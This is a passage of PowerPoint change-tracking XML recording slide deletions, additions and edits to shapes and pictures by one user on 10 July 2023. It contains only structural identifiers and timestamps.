        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:43:21.182" v="3423"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="274426760" sldId="1159"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:43:23.635" v="3424"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4076307099" sldId="1160"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:43:24.495" v="3425"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2232927229" sldId="1161"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:43:25.573" v="3426"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="375415155" sldId="1162"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:43:27.104" v="3427"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2826025027" sldId="1163"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:43:28.073" v="3428"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3829234993" sldId="1164"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:43:28.885" v="3429"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3874702717" sldId="1165"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:43:30.635" v="3430"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2119399601" sldId="1166"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:43:31.839" v="3431"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3949592473" sldId="1167"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:43:34.261" v="3432"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3339442119" sldId="1168"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:43:35.433" v="3433"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3206383973" sldId="1169"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:43:37.542" v="3434"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="469664767" sldId="1170"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:45:37.124" v="3472"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1777897685" sldId="1171"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:45:38.171" v="3473"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="743866967" sldId="1172"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:45:39.140" v="3474"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="874155768" sldId="1173"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:45:39.718" v="3475"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3500240594" sldId="1174"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:45:43.983" v="3476"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3324699218" sldId="1175"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:45:46.843" v="3477"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="282396932" sldId="1176"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:45:48.702" v="3478"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1607124036" sldId="1177"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:45:51.015" v="3481"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2412993616" sldId="1178"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:45:49.515" v="3480"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2421560429" sldId="1179"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:45:53.124" v="3482"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4068845370" sldId="1180"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:45:54.546" v="3483"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3484783368" sldId="1181"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:45:56.796" v="3484"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4053360668" sldId="1182"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:45:49.109" v="3479"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1679899334" sldId="1194"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add replId modNotes">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T14:34:31.379" v="73"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2428637725" sldId="1195"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T14:33:33.002" v="56" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2428637725" sldId="1195"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T14:33:49.237" v="65" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2428637725" sldId="1195"/>
            <ac:spMk id="4" creationId="{AE79AAD0-1CE8-5B1D-C43C-0A1A6DC5E0AE}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add replId modNotes">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T14:42:22.814" v="224" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="35812785" sldId="1196"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T14:34:50.676" v="90" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="35812785" sldId="1196"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T14:41:59.391" v="219" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="35812785" sldId="1196"/>
            <ac:spMk id="4" creationId="{AE79AAD0-1CE8-5B1D-C43C-0A1A6DC5E0AE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T14:36:32.476" v="138"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="35812785" sldId="1196"/>
            <ac:spMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T14:42:22.814" v="224" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="35812785" sldId="1196"/>
            <ac:spMk id="6" creationId="{4725628E-BBE1-B8E2-1A3B-DE00A7BDEBC2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T14:41:07.140" v="196" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="35812785" sldId="1196"/>
            <ac:picMk id="7" creationId="{D6F6EE8C-AABF-049A-1000-B0FC671EEAA8}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add replId modNotes">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T14:51:28.517" v="406" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2092211216" sldId="1197"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T14:42:38.017" v="230" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2092211216" sldId="1197"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T14:45:39.397" v="257" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2092211216" sldId="1197"/>
            <ac:spMk id="4" creationId="{AE79AAD0-1CE8-5B1D-C43C-0A1A6DC5E0AE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T14:44:53.474" v="244"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2092211216" sldId="1197"/>
            <ac:spMk id="6" creationId="{4725628E-BBE1-B8E2-1A3B-DE00A7BDEBC2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T14:51:24.391" v="405" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2092211216" sldId="1197"/>
            <ac:spMk id="8" creationId="{D46BA5A6-6D4D-4DF0-C6FE-F04BF8F0AED0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T14:45:21.897" v="253"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2092211216" sldId="1197"/>
            <ac:picMk id="5" creationId="{27EA2DEC-C336-AA53-B8FC-193B750D6726}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T14:44:48.146" v="241"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2092211216" sldId="1197"/>
            <ac:picMk id="7" creationId="{D6F6EE8C-AABF-049A-1000-B0FC671EEAA8}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T14:51:28.517" v="406" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2092211216" sldId="1197"/>
            <ac:picMk id="9" creationId="{CE933B05-BD95-D833-2BCC-6BE2AA2E704F}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add replId">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T15:10:19.283" v="943" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3502854763" sldId="1198"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T15:08:56.656" v="910"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3502854763" sldId="1198"/>
            <ac:spMk id="4" creationId="{AE79AAD0-1CE8-5B1D-C43C-0A1A6DC5E0AE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T14:53:02.097" v="413"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3502854763" sldId="1198"/>
            <ac:spMk id="8" creationId="{D46BA5A6-6D4D-4DF0-C6FE-F04BF8F0AED0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T15:10:19.283" v="943" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3502854763" sldId="1198"/>
            <ac:spMk id="10" creationId="{04E12160-5497-0081-AA17-21DA85A38413}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T15:09:15.797" v="916" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3502854763" sldId="1198"/>
            <ac:spMk id="11" creationId="{46FF45F9-A025-60E4-6F2A-635F26BEAE4B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T14:52:16.549" v="408"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3502854763" sldId="1198"/>
            <ac:picMk id="5" creationId="{27EA2DEC-C336-AA53-B8FC-193B750D6726}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T15:09:18.937" v="917" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3502854763" sldId="1198"/>
            <ac:picMk id="6" creationId="{3260F92A-CDAB-A1E0-F0AE-C38A6FABF288}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T15:09:39.454" v="929" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3502854763" sldId="1198"/>
            <ac:picMk id="7" creationId="{A2B18D43-ECA7-2D64-7D56-7B1568E7E556}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T14:52:17.440" v="409"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3502854763" sldId="1198"/>
            <ac:picMk id="9" creationId="{CE933B05-BD95-D833-2BCC-6BE2AA2E704F}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add replId">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T15:17:59.374" v="1039" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3625146657" sldId="1199"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T15:16:32.387" v="998" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3625146657" sldId="1199"/>
            <ac:spMk id="4" creationId="{AE79AAD0-1CE8-5B1D-C43C-0A1A6DC5E0AE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T15:17:59.374" v="1039" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3625146657" sldId="1199"/>
            <ac:spMk id="7" creationId="{CDBD9542-2DBF-D2E7-B05A-482A7199C2BD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T15:14:58.775" v="982" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3625146657" sldId="1199"/>
            <ac:picMk id="5" creationId="{90BF8F35-58F7-5CE2-04EC-CA12BFDBF646}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T15:17:00.122" v="1024" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3625146657" sldId="1199"/>
            <ac:picMk id="6" creationId="{6C1F13D9-E89E-E8D1-8729-91A58E6473D0}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add replId">
